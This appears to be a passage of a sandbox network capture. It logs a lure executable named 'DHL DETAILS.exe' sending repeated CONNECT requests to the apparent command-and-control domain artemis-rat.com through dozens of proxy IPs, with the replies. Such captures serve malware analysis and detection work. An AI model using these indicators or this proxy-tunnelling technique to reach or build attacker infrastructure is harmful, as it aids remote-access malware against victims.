Mar 9, 2024 13:14:15.111243010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
687	192.168.2.5	52293	104.17.132.79	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.111377001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.266154051 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
688	192.168.2.5	52236	204.236.176.61	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.111515999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.285609961 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:15.287266016 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 95 15 f1 a5 75 d9 14 28 25 00 56 51 e4 57 67 6c fa 8e 41 ec 0c 1d e7 0b 33 12 1b 92 70 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheRu(%VQWglA3p*,+0/$#('=<5/artemis-rat.com#\8t[lG5>@<CIcjP~2dZll;/A]
Mar 9, 2024 13:14:15.462451935 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 0b 02 2b 42 15 7e b7 7b ec 0b df 62 e6 f7 b0 52 58 d1 13 6c 4e 98 c2 a9 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9+B~{bRXlNDOWNGRD0000H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0H0";dJJH
Mar 9, 2024 13:14:15.544397116 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 56 18 41 a9 e9 fd 80 0f ac e9 08 50 52 a8 cc 9b 1f 3e 22 b6 b8 4d 2c ac f8 28 e5 cf 1d 6e 95 06 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 4a b7 e6 de 1c 55 dd a0 53 3b ab 09 4c 0d e7 f1 b7 e5 55 61 80 Data Ascii: %! VAPR>"M,(n(JUS;LUa:o\|y
Mar 9, 2024 13:14:15.717154026 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 7e f3 de 42 91 1c 8d cc bf bb c3 fb 59 0c 7f 1a d9 39 83 12 42 c3 bb 00 77 86 43 3d c7 5f 2a e0 31 e8 3a 14 d4 0b 79 fd Data Ascii: (~BY9BwC=_*1:y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
689	192.168.2.5	52298	203.30.188.247	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.111814976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.266386032 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
690	192.168.2.5	52311	104.16.109.213	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.112169027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.266624928 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
691	192.168.2.5	52121	43.163.192.3	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.112178087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
692	192.168.2.5	52164	184.178.172.28	15294	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.112179041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
693	192.168.2.5	52318	104.17.171.235	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.112549067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.266861916 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
694	192.168.2.5	52167	72.206.181.105	64935	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.112864971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
695	192.168.2.5	52296	50.63.12.33	14738	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.112876892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
696	192.168.2.5	52252	192.111.134.10	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.112879038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
697	192.168.2.5	51998	5.32.88.130	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.113225937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.541388035 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
698	192.168.2.5	52346	104.17.62.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.113228083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.269553900 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
699	192.168.2.5	49836	92.204.135.37	32524	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.113287926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
700	192.168.2.5	51468	178.54.21.203	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.113498926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
701	192.168.2.5	52359	172.67.254.127	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.114346027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.269808054 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
702	192.168.2.5	52214	154.205.152.96	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.114689112 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:15.629930019 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:16.333790064 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:17.724040031 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:20.224628925 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:22.723896980 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:25.333195925 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:30.333879948 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
703	192.168.2.5	52105	69.61.200.104	36181	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.117280006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
704	192.168.2.5	49799	78.128.81.220	31623	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.117791891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.248564005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.364658117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.380208015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
705	192.168.2.5	52237	104.20.103.68	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.117794037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.272733927 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
706	192.168.2.5	52246	34.23.45.223	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.119910002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.645598888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.334105015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724195957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.072774887 CET	811	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:29 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 619 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 6f 70 6f 72 74 65 74 69 40 63 6f 64 65 31 30 30 2e 63 6f 6d 2e 70 79 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at soporteti@code100.com.py to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
707	192.168.2.5	52099	3.37.125.76	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.120783091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.442336082 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
708	192.168.2.5	52172	3.10.93.50	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
